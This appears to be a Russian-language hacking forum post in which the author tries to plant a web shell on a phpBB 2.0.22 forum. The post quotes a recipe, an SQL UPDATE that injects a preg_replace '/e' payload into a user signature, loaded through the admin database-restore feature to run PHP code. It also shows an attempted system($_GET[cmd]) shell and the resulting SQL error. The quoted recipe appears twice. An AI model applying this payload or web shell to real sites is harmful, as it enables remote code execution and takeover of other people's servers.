Unknown
07.10.2012, 16:43
Пытаюсь залить шелл на форум phpBB 2.0.22 этим способом:
Code:
Создаем текстовый файл 1.sql суем в него код Код: UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo()' WHERE user_id=2; ну вместо 2 ставим свой id Заходим в админку, жмем востановление базы данных, выбираем файл 1.sql, и со звуком хлопец-хлопца-хоп-ца-ца заходим в профайл а наблюдаем phpinfo()
Напоминаю, после ":" идет любой php код.
phpinfo() выдает, но при вставке другого кода отказывается восстанавливать базу, либо не открывает страницу профиля
Пробовал вставлять и system($_GET[cmd]); при восстановлении ругается:
Code:
SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Code:
Создаем текстовый файл 1.sql суем в него код Код: UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo()' WHERE user_id=2; ну вместо 2 ставим свой id Заходим в админку, жмем востановление базы данных, выбираем файл 1.sql, и со звуком хлопец-хлопца-хоп-ца-ца заходим в профайл а наблюдаем phpinfo()
Напоминаю, после ":" идет любой php код.
phpinfo() выдает, но при вставке другого кода отказывается восстанавливать базу, либо не открывает страницу профиля
Пробовал вставлять и system($_GET[cmd]); при восстановлении ругается:
Code:
SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '